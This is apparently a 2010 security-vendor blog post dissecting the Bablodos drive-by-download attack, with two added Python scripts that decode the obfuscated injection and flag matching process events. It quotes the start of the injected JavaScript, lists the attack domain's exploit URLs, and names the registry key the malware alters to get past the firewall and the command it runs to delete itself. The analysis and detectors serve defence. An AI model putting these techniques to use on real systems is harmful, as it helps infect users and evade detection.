Wednesday, March 3, 2010

Anatomy of the Bablodos drive-by-download attack

Hackers have come to rely less on distributing malware via email
attachments and have opted instead for infecting legitimate websites with
drive-by downloads as the de facto way of more aggressive
distribution. Just by loading an infected web page in a browser, a
virus can be downloaded to a computer without the user's knowledge.
The implications are often disastrous and range from reputation/brand
and revenue loss to data theft.

One particular attack stood out due to the number of exploits it
used and the number of processes it started -- it was quite "blatant".
While hackers often take steps to evade detection, Bablodos didn't
seem to bother. Based on Dasient's last malware report for 2009,
the average number of extra processes initiated by hackers in Q4 '09
was just 2.8 -- enough for a downloader and perhaps one or
two pieces of malware. (As a comparison, in previous years
a drive-by download would often initiate 10 or more
extra processes, ostensibly in an attempt to maximize the return from
each infected endpoint.) This shows us that attackers are getting
smarter about the way they structure their attacks, opting for a
smaller footprint on an infected machine in exchange for a greater
likelihood of evading detection.

Enter bablodos.com. This brazen attack took advantage of a large
number of different vulnerabilities on the user's computer, modified
personal firewall settings, started as many as 8 processes, and then deleted
itself from disk 5 seconds later. Obviously it wasn't trying to hide
anything; the goal was to cause as much damage as possible in a short amount of time.
Clearly, some of today's hackers aren't afraid of being detected.

So how exactly does this attack work?

STEP 1

Bablodos .com infects vulnerable sites by injecting obfuscated JavaScript code into their web pages.

Here are the first few bytes of the malicious JS snippet: "document.write(String.fromCharCode(60,116,97,98,108,101,32,98,111,114,100..."

This JS code loads

bablodos .com/x/jar.jar
bablodos .com/counter/swf.swf
bablodos .com/counter/exe.php
bablodos .com/counter/pdf.php

to probe for vulnerabilities in the Flash and PDF browser plugins and in the Java Runtime Environment.
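As an added example (not code from the original post), a small Python scanner that decodes document.write(String.fromCharCode(...)) snippets like the one quoted above and reports any remote URLs the decoded markup would load from the attack domain. The sample page is constructed: only its first eleven character codes ("<table bord") are the ones quoted in the post, and the rest of the decoded markup is assumed.

```python
import re
from urllib.parse import urlparse

# Attack domain named in the post (defanged there as "bablodos .com").
KNOWN_BAD_DOMAINS = {"bablodos.com"}

FROMCHARCODE_RE = re.compile(
    r"String\.fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)", re.IGNORECASE)
URL_RE = re.compile(
    r"""(?:src|href|data)\s*=\s*["']?(https?://[^"'\s>]+)""", re.IGNORECASE)

def decode_fromcharcode(page_html):
    """Return the plaintext of every String.fromCharCode(...) call on the page."""
    return ["".join(chr(int(code)) for code in m.group(1).split(","))
            for m in FROMCHARCODE_RE.finditer(page_html)]

def extract_urls(html):
    """Pull absolute http(s) URLs out of src/href/data attributes."""
    return URL_RE.findall(html)

def is_known_bad(host):
    """True if host is the attack domain or one of its subdomains."""
    return any(host == d or host.endswith("." + d) for d in KNOWN_BAD_DOMAINS)

def scan_page(page_html):
    """Decode obfuscated writes and report every remote URL they would load."""
    findings = []
    for decoded in decode_fromcharcode(page_html):
        for url in extract_urls(decoded):
            host = (urlparse(url).hostname or "").lower()
            findings.append({"url": url, "host": host, "known_bad": is_known_bad(host)})
    return findings

# Constructed sample page. The first eleven codes (60,116,...,100 = "<table bord")
# are the ones quoted in the post; the remainder of the decoded markup is assumed.
_ASSUMED_DECODED = ('<table border=0><tr><td><iframe src="http://bablodos.com/counter/pdf.php"'
                    ' width=1 height=1></iframe></td></tr></table>')
SAMPLE_PAGE = ('<html><body><h1>Welcome</h1><script>document.write(String.fromCharCode('
               + ",".join(str(ord(ch)) for ch in _ASSUMED_DECODED)
               + '));</script></body></html>')

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(("BAD " if finding["known_bad"] else "ok  ") + finding["url"])
```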

STEP 2

Users visiting these victim sites are infected in the following way:

* An executable named file.exe is downloaded into the \Documents and Settings\%USER% folder and run without the user's consent. It is classified as a downloader by many antivirus engines according to this VirusTotal analysis.

* This executable bypasses the Windows Firewall by modifying the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

* It then downloads additional malware into the temp folder and starts as many as 8 new processes, whose file names consist of 10 random characters, such as
SUHyAwDJUT.exe, AJvvOxjPBD.exe, YylDMSreSn.exe, etc.

* To avoid detection, the downloaded malware is deleted from disk after it starts executing, using the command:
C:\WINDOWS\system32\cmd.exe /c timeout 5 && del %TEMP%\[10chars].exe
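The host-side indicators in the four steps above lend themselves to simple process-event triage; the following Python is an added example (not part of the original post) that matches constructed process-creation and registry-write events against those indicators. The events, the user name "alice" and the event field names are assumptions; the file names and registry key are the ones quoted in the post.

```python
import re

# Host-based indicators described in the post (XP-era profile paths, as in the original).
DROPPER_RE = re.compile(r"\\Documents and Settings\\[^\\]+\\file\.exe$", re.I)
TEMP_RANDOM_RE = re.compile(
    r"\\(?:Local Settings\\)?Temp\\[A-Za-z0-9]{10}\.exe$", re.I)
SELF_DELETE_RE = re.compile(
    r"cmd\.exe\s+/c\s+timeout\s+\d+\s*&&\s*del\s+.*\\[A-Za-z0-9]{10}\.exe", re.I)
FIREWALL_LIST_KEY = (r"SYSTEM\ControlSet001\Services\SharedAccess\Parameters"
                     r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List")

def classify_event(event):
    """Return the names of the indicators a single process/registry event matches."""
    hits = []
    if DROPPER_RE.search(event.get("image", "")):
        hits.append("dropper_in_user_profile")
    if TEMP_RANDOM_RE.search(event.get("image", "")):
        hits.append("random_name_in_temp")
    if SELF_DELETE_RE.search(event.get("cmdline", "")):
        hits.append("timeout_and_del_self_delete")
    if FIREWALL_LIST_KEY.lower() in event.get("reg_key", "").lower():
        hits.append("firewall_exception_added")
    return hits

def triage(events):
    """Keep only the events that match at least one indicator, with their hits."""
    flagged = []
    for event in events:
        hits = classify_event(event)
        if hits:
            flagged.append((event["id"], hits))
    return flagged

# Constructed sample events for a hypothetical user "alice".
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Documents and Settings\alice\file.exe", "cmdline": ""},
    {"id": 2, "image": r"C:\Documents and Settings\alice\file.exe", "cmdline": "",
     "reg_key": r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters"
                r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List"},
    {"id": 3, "image": r"C:\Documents and Settings\alice\Local Settings\Temp\SUHyAwDJUT.exe",
     "cmdline": ""},
    {"id": 4, "image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": r"C:\WINDOWS\system32\cmd.exe /c timeout 5 && del %TEMP%\SUHyAwDJUT.exe"},
    {"id": 5, "image": r"C:\Program Files\Internet Explorer\iexplore.exe", "cmdline": ""},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(event_id, ", ".join(hits))
```

The registry match uses the ControlSet001 path quoted in the post; on a live system the same key is normally reached through CurrentControlSet, so a real collector should match both spellings.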

Since January of this year, at least 50 sites have been hit by bablodos.com.

Had these sites been monitored by Dasient WAM, they would have been alerted in real time that malware was on their site, and they would have been able to contain the infection and prevent it from spreading.
